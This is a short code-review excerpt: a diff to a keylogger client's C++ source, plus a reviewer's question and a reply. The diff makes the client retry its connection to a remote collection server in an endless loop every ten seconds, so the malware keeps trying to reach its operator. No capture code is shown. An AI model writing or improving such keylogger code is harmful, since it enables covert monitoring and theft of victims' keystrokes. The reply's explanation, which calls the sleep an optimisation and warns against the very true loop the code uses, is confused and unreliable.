src/keylogger/client_keylogger.cpp

```diff
@@ -14,14 +17,38 @@ client_keylogger::~client_keylogger()
 	Disconnect();
 }
 
+bool client_keylogger::connectToServer()
+{
+    std::cout << "Establishing connection!\n";
+
+    if (!Connect(server_ip, server_port))
+    {
+        return false;
+    }
+
+
+    return true;
+}
+
+
 void client_keylogger::connectInnit()
 {
-	std::cout << "connectInnit()!\n";
-	if (!Connect(server_ip, server_port))
-	{
-		return;
-	}
-	kq::message<messageType> msg(messageType::targetConnected);
+    std::cout << "connectInnit()!\n";
 
-	Send(msg);
-}
\ No newline at end of file
+    while (true)
+    {
+        if (!connectToServer())
+        {
+            std::cout << "ERROR: No connection could be made. Retrying in 10 seconds...\n";
+            std::this_thread::sleep_for(std::chrono::seconds(10));
```

Comment:
why are we sleeping here?

Reply:
We put the thread on sleep, because it helps with optimization, also having a true loop is not recommended as this can consume a lot of system resources.